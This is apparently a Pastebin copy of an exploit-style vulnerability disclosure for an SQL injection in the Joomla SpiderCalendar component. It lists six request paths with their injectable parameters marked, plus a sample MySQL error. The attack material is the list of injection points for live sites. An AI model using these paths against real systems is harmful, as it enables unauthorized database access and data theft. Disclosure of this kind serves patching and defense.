Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Joomla SpiderCalendar Components 3.2.17 SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 25/02/2019
- # Vendor Homepage : web-dorado.com
- # Software Download Link : web-dorado.com/products/joomla-calendar.html
- # Software Information Link : extensions.joomla.org/extension/spider-calendar/
- # Software Affected Versions : 3.2.6 and 3.2.17 / All Previous Versions
- # Software Price Type : Paid Download ~ 20$ - 30$ - 40$
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- Spider Calendar is one of the best event calendars available in JED. Spider Calendar is a
- highly configurable responsive extension which allows you to have multiple organized
- events in a calendar. If you have problem with organizing your events and displaying
- them in a calendar format, then Spider Calendar is the best solution
- ####################################################################
- # Impact :
- ***********
- Joomla SpiderCalendar 3.2.17 [ and other versions ] component for Joomla is prone
- to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied
- data before using it in an SQL query. Exploiting this issue could allow an attacker
- to compromise the application, access or modify data, or exploit latent vulnerabilities
- in the underlying database. A remote attacker can send a specially crafted request
- to the vulnerable application and execute arbitrary SQL commands in application`s database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_spidercalendar&calendar_id=[SQL Injection]
- /index.php?option=com_spidercalendar&date=[SQL Injection]
- /index.php?option=com_spidercalendar&view=bigcalendarweek&def_view=list&views=&rand=[ID-NUMBER]&theme_id=[ID-NUMBER]&calendar=[ID-NUMBER]&cat_id=&cat_ids=&format=row&tmpl=component&Itemid=[SQL Injection]
- /index.php?option=com_spidercalendar&view=spidercalendarbig_seemore&theme_id=[ID-NUMBER]&ev_ids=&calendar_id=[ID-NUMBER]&date=[YEAR]-[MONTH]-[DAY]&cat_id=&cat_ids=[SQL Injection]&tmpl=component
- /index.php?option=com_spidercalendar&view=spidercalendarbig&theme_id=[ID-NUMBER]&calendar_id=[ID-NUMBER]&eventID=[ID-NUMBER]&date=[YEAR]-[MONTH]-[DAY]&day=[ID-NUMBER]&ev_ids=[SQL Injection]&tmpl=component
- /index.php?option=com_spidercalendar&view=bigcalendarweek&def_view=list&views=&rand=[ID-NUMBER]&theme_id=[ID-NUMBER]&calendar=[ID-NUMBER]&cat_id=&cat_ids=&format=row&tmpl=component&Itemid=[ID-NUMBER]&months=[YEAR]-[MONTH]-[DAY]&date=[YEAR]-[MONTH]-[DAY][SQL Injection]
- ####################################################################
- # Example SQL Database Error :
- ****************************
- 1064 - You have an error in your SQL syntax; check the manual that corresponds to your
- MySQL server version for the right syntax to use near ')' at line 2 SQL=SELECT *
- FROM fx5md_spidercalendar_event where calendar=1 AND id IN ()
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment